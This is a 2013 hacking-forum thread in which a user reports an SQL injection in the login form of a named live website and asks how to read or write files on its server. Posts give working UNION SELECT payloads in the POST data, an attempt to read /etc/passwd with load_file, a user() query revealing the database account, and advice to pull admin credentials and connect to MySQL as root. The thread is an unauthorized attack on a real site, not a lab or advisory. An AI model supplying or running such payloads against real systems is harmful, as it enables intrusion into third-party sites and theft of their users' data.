Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
How put file with this sql injection ?
Posted by: 0xAsc11
Date: July 20, 2013 05:00AM

Hi all,

i found an SqlI here : http://www.leclubdesproprietaires.com/

with this post data : login=nop") union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28;#&pass=nop

fields 3 and 4 are visible in the site.

i got all informations that i want in the Bd but i can't write local file (limited right).

concerning read file, this injection :
login=aaa") union select 1,2,load_file('/etc/passwd'),4,...27,28;#&pass=aaa return NULL

how can i read or write local file ?

thks

Options: ReplyQuote
Re: How put file with this sql injection ?
Posted by: hack2012
Date: July 26, 2013 05:13AM

login=nop") union select 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28;#&pass=nop

user = c1bc_cp_dba@localhost

it's not root

there is no file_priv to load_file or into outfile...

so you must to get the username and password from admin table.

Options: ReplyQuote
Re: How put file with this sql injection ?
Posted by: 0xAsc11
Date: July 26, 2013 06:53AM

thanks for your answer,

if i found the root password, what is the sql command to connect as root ?

Options: ReplyQuote
Re: How put file with this sql injection ?
Posted by: jammy99
Date: July 28, 2013 10:46PM

there is direct command to connect to mysql on server with root or any ither user.

you can use any mysql client to like sqlwave to connect to mysql of any host.
but you can only connect if server accepts remote connection.

Options: ReplyQuote
Re: How put file with this sql injection ?
Posted by: hack2012
Date: July 30, 2013 02:40AM

if you found, and root user not deny your ip, you can link it with sql client.

Options: ReplyQuote


Sorry, only registered users may post in this forum.